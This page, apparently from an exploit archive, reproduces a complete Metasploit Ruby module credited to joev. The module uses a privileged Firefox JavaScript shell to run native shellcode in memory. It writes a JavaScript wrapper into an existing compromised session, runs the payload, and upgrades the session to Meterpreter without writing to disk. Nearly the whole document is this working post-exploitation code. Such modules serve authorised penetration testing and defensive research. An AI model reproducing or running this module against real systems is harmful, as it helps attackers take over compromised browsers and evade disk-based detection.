Firefox Exec Shellcode From Privileged Javascript Shell

2014.03.14
Credit: joev
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/payload/firefox'

class Metasploit3 < Msf::Exploit::Local

  include Msf::Payload::Firefox
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Firefox Exec Shellcode from Privileged Javascript Shell',
      'Description'    => %q{
        Allows execution of native payloads from a privileged Firefox Javascript shell.
        Puts the specified payload into memory, adds the necessary protection flags,
        and calls it. Useful for upgrading a Firefox javascript shell to a Meterpreter
        session without touching the disk.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'joev' ],
      'Platform'       => [ 'firefox' ],
      'DisclosureDate' => 'Mar 10 2014',
      'Targets'        => [
        [
          'Native Payload', {
            'Platform' => %w{ linux osx win unix },
            'Arch'     => ARCH_ALL
          }
        ]
      ],
      'DefaultTarget'  => 0
    ))

    register_options([
      OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90])
    ], self.class)
  end

  def exploit
    # Write the JavaScript to the existing session, wrapped in [JAVASCRIPT] tags.
    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
    # Read until the [!JAVASCRIPT] token arrives, waiting at most TIMEOUT seconds.
    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
    print_warning(results) if results.present?
  end

  # Builds the JavaScript wrapper. run_payload is not defined in this file;
  # it comes from the included mixins. Any exception is reported back via send().
  def js_payload
    %Q|
      (function(send){
        try {
          #{run_payload}
          send("Payload executed.");
        } catch (e) {
          send(e);
        }
      })(send);
    |.strip
  end
end

